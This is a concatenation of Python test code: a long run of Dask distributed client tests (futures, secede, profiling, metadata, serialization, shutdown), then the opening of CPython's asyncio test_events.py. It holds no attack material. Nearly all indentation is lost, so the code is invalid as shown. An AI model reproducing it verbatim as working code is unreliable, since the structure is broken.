assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=r"^{}$".format(msg)):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1, timeout=100)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@pytest.mark.slow
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2, timeout=60)
async def test_secede_balances(c, s, a, b):
count = threading.active_count()
def f(x):
client = get_client()
sleep(0.01) # do some work
secede()
futures = client.map(slowinc, range(10), pure=False, delay=0.01)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(100))
start = time()
while not all(f.status == "finished" for f in futures):
await asyncio.sleep(0.01)
assert threading.active_count() < count + 50
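    # the seceded work should end up spread roughly evenly across the two workers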
assert len(a.log) < 2 * len(b.log)
assert len(b.log) < 2 * len(a.log)
results = await c.gather(futures)
assert results == [sum(map(inc, range(10)))] * 100
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def f():
client = get_client()
client.submit(slowinc, 1, delay=0.2, key="slowinc")
future = c.submit(f, key="f")
await asyncio.sleep(0.1)
if len(s.tasks) == 2:
assert (
s.priorities["f"] > s.priorities["slowinc"]
) # lower values schedule first
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def _test_dynamic_workloads_sync(c, delay):
future = c.submit(_dynamic_workload, 0, delay=delay)
assert future.result(timeout=40) == 52
def test_dynamic_workloads_sync(c):
_test_dynamic_workloads_sync(c, delay=0.02)
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
_test_dynamic_workloads_sync(c, delay="random")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = type("")
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = type("")
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(
loop=loop, scheduler_port=0, dashboard_address=None, silence_logs=False
) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
w = a if future.key in a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing and not b.executing:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing and not b.executing:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
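    # a profiling window entirely in the future should contain no samples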
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
start = time()
while future.status != "finished":
await asyncio.sleep(0.01)
assert time() < start + 1
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
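    # resubmitting the same large object should warn at most once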
assert len(record) < 2
@gen_cluster()
async def test_scatter_direct(s, a, b):
c = await Client(s.address, asynchronous=True, heartbeat_interval=10)
last = s.clients[c.id].last_seen
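    # periodic heartbeats from the client should refresh last_seen on the scheduler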
start = time()
while s.clients[c.id].last_seen == last:
await asyncio.sleep(0.10)
assert time() < start + 5
await c.close()
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
d = {"a": 1}
result = await c.submit(d.get, "a")
assert result == 1
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop, s, a, b):
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@pytest.mark.asyncio
async def test_dashboard_link_inproc(cleanup):
async with Client(processes=False, asynchronous=True) as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.web
import tornado.httpserver
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
async def test(s, a, b):
import numpy as np
async with Client(
s.address, asynchronous=True, serializers=["dask", "msgpack"]
) as c:
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
test()
@gen_cluster()
async def test_de_serialization(s, a, b):
import numpy as np
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
import numpy as np
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=None) as c:
c.close()
c._repr_html_()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
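    # scheduler priorities should preserve dask.order's relative ordering of the two keys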
assert (o[x.key] < o[y.key]) == (
s.tasks[tokey(fx.key)].priority < s.tasks[tokey(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
def test_no_threads_lingering():
active = dict(threading._active)
assert threading.active_count() < 40, list(active.values())
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*[c.scatter(1, direct=True) for _ in range(5)])
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
start = proc.num_fds()
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Worker(s.address, nthreads=2) as a, Worker(
s.address, nthreads=2
) as b:
async with Client(s.address, asynchronous=True) as c:
await df.sum().persist()
begin = time()
while proc.num_fds() > begin:
await asyncio.sleep(0.01)
assert time() < begin + 5, (start, proc.num_fds())
@pytest.mark.asyncio
async def test_dashboard_link_cluster(cleanup):
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(processes=False, asynchronous=True) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@pytest.mark.asyncio
async def test_shutdown(cleanup):
async with Scheduler(port=0) as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == "closed"
assert w.status == "closed"
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(n_workers=1, asynchronous=True, processes=False) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == "closed"
@pytest.mark.asyncio
async def test_config_inherited_by_subprocess(cleanup):
def f(x):
return dask.config.get("foo") + 1
with dask.config.set(foo=100):
async with LocalCluster(n_workers=1, asynchronous=True, processes=True) as lc:
async with Client(lc, asynchronous=True) as c:
result = await c.submit(f, 1)
assert result == 101
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
pytest.importorskip("dask.dataframe")
df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
futures = futures_of(df)
for k, f in zip(df.__dask_keys__(), futures):
assert str(k) in str(f)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
for i in range(5):
try:
x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
await wait(x)
await asyncio.gather(
c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
)
p = await c.profile(server=True) # All worker servers
assert "slowinc" in str(p)
p = await c.profile(scheduler=True) # Scheduler
assert "slowdec" in str(p)
except AssertionError:
if i == 4:
raise
else:
pass
else:
break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
future = c.submit(inc, 1)
async def f(): # flake8: noqa
result = await future
assert result == 2
await f()
future = c.submit(div, 1, 0)
async def f():
with pytest.raises(ZeroDivisionError):
await future
await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures)
results = []
async def f():
async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
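    # gathering the results should not register any "gather" operation on the scheduler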
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
def test_async_with(loop):
result = None
client = None
cluster = None
async def f():
async with Client(processes=False, asynchronous=True) as c:
nonlocal result, client, cluster
result = await c.submit(lambda x: x + 1, 10)
client = c
cluster = c.cluster
loop.run_sync(f)
assert result == 11
assert client.status == "closed"
assert cluster.status == "closed"
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
da = pytest.importorskip("dask.array")
async def f():
"""
We wrap this in a function so that the assertions aren't in the
        performance report itself
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(filename=fn):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
data = await f()
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
@pytest.mark.asyncio
async def test_client_gather_semaphor_loop(cleanup):
async with Scheduler(port=0) as s:
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
test_events.py
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import tempfile
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
